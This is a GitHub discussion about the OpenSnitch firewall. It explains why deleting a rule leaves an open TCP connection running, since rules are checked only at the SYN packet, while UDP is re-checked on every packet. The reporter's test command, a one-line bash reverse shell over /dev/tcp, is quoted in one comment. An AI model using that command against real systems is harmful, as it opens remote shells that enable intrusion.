### DISCUSSION TITLE
Rules removal doesn't apply when its owner is running

### DISCUSSION THREAD

**Discussion by molitona** [evilsocket/opensnitch#542] [General]
Hi, I noticed that rules removal doesn't take effect immediately when its owner (binary that made request) is running. So, I've to restart the binary/software to let it request it again.

I tested that by getting a reverse shell from my own machine to kali linux. For that, I granted reverse shell request with opensnitch then I removed that rule from opensnitch gui and still have a reverse shell on kali linux (I'll have to kill my terminal where I typed the command that will give kali a reverse shell of my machine to stop the reverse shell on kali).

Why removing a rule doesn't apply immediately when its owner is running.

**Comment by gustavo-iniguez-goya** [comment]
That's because we allow the first package for TCP, so from that on the connection is allowed.

When you remove a rule we don't kill the sockets associated with that connection. We don't keep a list of connectiones initiated by a process, so we wouldn't be able to kill those sockets anyway.

If the connection is UDP then after you remove a rule you'll be prompted to allow or deny it again.

**Reply by molitona** [reply]
Thanks, I got your second line well.

But, what do you mean by first package of TCP ?
Also, does removing UDP rule kills the sockets then?? (that's why I receive prompt again)?

**Reply by molitona** [reply]
@gustavo-iniguez-goya

**Comment by gustavo-iniguez-goya** [comment]
oops, sorry molitona, I'd totally forgoten this.

What network protocol did you use for to establish the reverse shell? And what binary (application) did you use? Can you post the shell command?

**Comment by molitona** [comment]
I USED:sh -i >& /dev/tcp/IP/PORT 0>&1
BTW, you haven't yet responded me for my 2 questions.
Dec 12, 2021, 22:49 by ***@***.***:

**Comment by gustavo-iniguez-goya** [comment]
> Also, does removing UDP rule kills the sockets then?? (that's why I receive prompt again)?

No.

> But, what do you mean by first package of TCP ?

I think it's better to explain it with images.

This is a typical TCP connection ([0](http://intronetworks.cs.luc.edu/current2/html/tcpA.html)). As you see, we only check rules on the very first stage of it, when an application sends a SYN packet:

![image](https://user-images.githubusercontent.com/2742953/145729050-57bdcfd7-f4fe-4664-995b-8657aed41005.png)

Once allowed, the app starts sending data, and we don't check what is being sent nor the properties of it. If you remove a rule while the app is sending data, since the app doesn't send a SYN packet, we don't check the rules, thus, the connection is not stopped to allow or deny it.

So if you remove a rule while you have a TCP reverse shell active (or any other application), the reverse shell will keep working.

However let's take a look a UDP connection:

![image](https://user-images.githubusercontent.com/2742953/145730322-89e1f7ae-500b-4e3e-baec-1fc20d3c5b9f.png)

In this case there're no SYN packets. Every call to sendto() is handled as a new connection, so the rules are checked over and over. 
If you decide to remove a rule while a UDP transmission is being taken place, on the next UDP packet we'll check the rules, and if there's no rule for that connection we'll prompt the user again to allow or deny it.

**Comment by molitona** [comment]
Thanks a lot for explanation <3
